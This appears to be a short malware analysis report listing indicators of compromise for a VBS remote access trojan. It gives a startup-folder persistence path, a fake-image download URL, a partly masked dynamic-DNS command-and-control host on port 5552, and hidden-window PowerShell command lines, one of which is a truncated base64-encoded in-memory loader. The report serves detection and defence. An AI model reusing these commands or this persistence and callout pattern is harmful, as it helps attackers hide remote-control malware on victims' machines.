Technical information
- %APPDATA%\microsoft\windows\start menu\programs\startup\server.vbs
- https://f.top4top.io/p_1514cgtfp1.jpg
- %TEMP%\server.vbs
- 'jh#####n4842.ddns.net':5552
- 'f.###4top.io':443
- DNS ASK f.###4top.io
- DNS ASK jh#####n4842.ddns.net
- '%WINDIR%\syswow64\wscript.exe' "%TEMP%\Server.Vbs"
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -windowstyle hidden (Start-Process -FilePath $env:TEMP\Server.Vbs)' (with a hidden window)
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -noexit -enc WwBBAHAAcABEAG8AbQBhAGkAbgBdADoAOgBDAHUAcgByAGUAbgB0AEQAbwBtAGEAaQBuAC4ATABvAGEAZAAoAFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAGIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAKABOAGUAdwAtAE8AYgB...' (with a hidden window)
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -windowstyle hidden (Start-Process -FilePath $env:TEMP\Server.Vbs)